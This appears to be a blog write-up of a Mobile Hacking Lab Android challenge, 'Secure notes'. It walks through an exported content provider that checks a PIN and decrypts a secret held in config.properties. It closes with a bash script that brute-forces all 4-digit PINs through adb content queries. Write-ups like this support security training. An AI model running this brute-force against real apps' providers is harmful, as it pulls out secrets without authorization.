Secure notes

Hello everyone , In this blog post , I will try to explain my solution steps for Secure notes challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

1. Let’s Examine the AndroidMainfest.xml

2. After That i found 2 Providers ( com.mobilehackinglab.securenotes.secretprovider - androidx.startup.InitializationProvider) and 1 exported Activity (MainActivity )

   

   image.png
3. The MainActivity interact with a content provider, to validate a PIN and retrieve a secret value associated with that PIN.

4. there is a listener set on a submitPinButton,

   1. when click the code call onCreate$lambda$0 () function ,,

   2. then it , which retrieves the text from pinEditText

   3. then use querySecretProvider to validate the entered pin

      
5. Let’s analysis the com.mobilehackinglab.securenotes.SecretDataProvider :

   1. first of all the correct Pin use a key to decrypt the data stored in config.properties file

      
   2. then let’s keep going in our code

      
   3. it take a query string

   4. check for if it null , return null

   5. if there is a value then remove the prefix and then extract the int number from it

      
   6. in the end it invoke the decryptSecret()

   7. if the Cursor return valid , the code look for secret column to query the pin

   8. If a valid cursor is returned and data is available, the code looks for a column named "Secret", expecting this to hold the result of the query.

6. Let’s back to the config.properties file and try to decrypt it manual

   
7. Let’s try to brute force the pinget the decrypted Text

   #!/bin/bash
   
   # Define the content provider URI
   CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider"
   
   # Loop through all 4-digit PIN combinations (0000 to 9999)
   for pin in $(seq -w 0000 9999); do
       echo "Trying PIN: $pin"
   
       # Use ADB to send the query command to the content provider
       adb shell content query --uri "$CONTENT_URI" --where "pin=$pin"
   
       # Check the output to see if it indicates a successful attempt
       # Assuming "Secret" is returned upon success, otherwise adjust the condition
       if adb shell content query --uri "$CONTENT_URI" --where "pin=$pin" | grep -q "Secret"; then
           echo "PIN found: $pin"
           break
       fi
   done